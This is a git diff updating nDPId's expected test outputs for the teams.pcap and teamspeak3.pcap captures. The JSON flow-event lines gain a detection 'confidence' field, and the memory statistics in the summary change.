+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695422,"flow_last_seen":1587041695432,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693611,"flow_last_seen":1587041697663,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1587041693654,"flow_last_seen":1587041697713,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1745,"flow_avg_l4_payload_len":193,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693582,"flow_last_seen":1587041693698,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","total-events-serialized":596}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2817/2775
@@ -602,9 +602,9 @@
 ~~ total active/idle flows...: 83/83
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 6020956 bytes
-~~ total memory freed........: 6020956 bytes
-~~ total allocations/frees...: 103019/103019
+~~ total memory allocated....: 6079013 bytes
+~~ total memory freed........: 6079013 bytes
+~~ total allocations/frees...: 104609/104609
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 1942 chars
diff --git a/test/results/teamspeak3.pcap.out b/test/results/teamspeak3.pcap.out
index 2f276d10f..d8c259f12 100644
--- a/test/results/teamspeak3.pcap.out
+++ b/test/results/teamspeak3.pcap.out
@@ -1,10 +1,10 @@
 00442{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"teamspeak3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946745680740,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":946745680740,"pkt":"REREREREZmZmZmZmCABFAAA+yVhAAHgRnjQKAAABCgAAAs\/DJwMAKptdVFMzSU5JVDEAZQAAiA3QV2YAX1kW4K3na2EAAAAAAAAAAA=="}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","ndpi": {"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}}
 00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946745680740,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"ts_msec":946745680740,"pkt":"REREREREZmZmZmZmCABFAADYyVlAAHgRnZkKAAABCgAAAs\/DJwMAxJv3eXRj6JO6fmAAAAAAIp10i0Wqe++5nv6tCBm6z0HgFqIVc9rwk+JLXtHwnSIOS9qVPnECnykaLcJG8hX08WvnftBqcJmqRqZMetkjLRcZ56Qb0yr7w3DD9zi02VU5x7l+AWx+kCtuxsALbdDKU+g3u9+7M\/R0k3h6Cj2dgqVHMwYrJL8wicW8AZK\/KfPOtEoKiRpNuYkxO9WWvZSdqdAZVZGl4X6vDNBIwrDu7kll5TuFIGNHjpSa9tdfD6M="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946745681306,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":946745681306,"pkt":"REREREREZmZmZmZmCABFAAA+yX1AAHgRng8KAAABCgAAAs\/DJwMAKptdVFMzSU5JVDEAZQAAiA3QV2YAX1kW4K3na2IAAAAAAAAAAA=="}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946745680740,"flow_last_seen":946745717746,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":946745717746,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}}
